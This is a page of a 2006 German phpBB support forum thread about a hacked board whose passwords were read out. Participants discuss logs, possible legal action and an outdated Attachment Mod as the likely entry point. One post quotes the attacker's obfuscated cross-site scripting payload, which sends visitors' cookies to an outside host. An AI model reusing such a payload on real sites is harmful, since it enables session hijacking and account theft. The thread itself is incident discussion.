phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Gehackt + Passwoerter ausgelesen! Wie?

https://www.phpbb.de/community/viewtopic.php?t=109823

Seite 3 von 3

Verfasst: 19.01.2006 20:23
von Wissler
daruler hat geschrieben: Auf welchen schadcode?
Na, den hier:

Code: Alles auswählen

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top :expression(eval(this.sss));'sss=`i=new/**/Image( );i.src='http://mouze.org/bin/c.php?c='+document .cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

Verfasst: 19.01.2006 20:32
von larsneo
yep. dazu dann noch die logfiles der zugriffe auswerten und juristische schritte einleiten. nachdem der angriff ja zur abwechslung einmal nicht automatisiert über irgendwelche anonymen brasilianischen proxies sondern gezielt von einem script kiddie durchgeführt wurde, hast du da unter umständen sogar ganz gute chancen.

Verfasst: 25.01.2006 17:50
von daruler
Ich glaube kaum, dass ich rechtliche Schritte einleiten werde, da ich den "Hacker" kenne und er auch fast keinen Schaden angerichtet hat.

Ich glaube jedoch zu wissen wie der Hacker an die Passwoerter herankam:

http://www.phpbb.de/viewtopic.php?t=85972


Hallo,

der Fall hat sich geklärt. Es handelt sich nicht um einen Bug in Hotchis Download Mod, sondern um eine alte Version des Attachment Mods.

Es gibt nämlich 2 Dateien die ähnlich lauten: download.php und downloads.php

Ich habe (hatte) noch eine alte Version des Attachment Mods laufen, was ich nun korrigiert habe. Durch die alte Version des Attachment-Mods konnte der Hacker Zugriff auf mein Passwort bekommen.
Alle Zeiten sind UTC+01:00
Seite 3 von 3

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de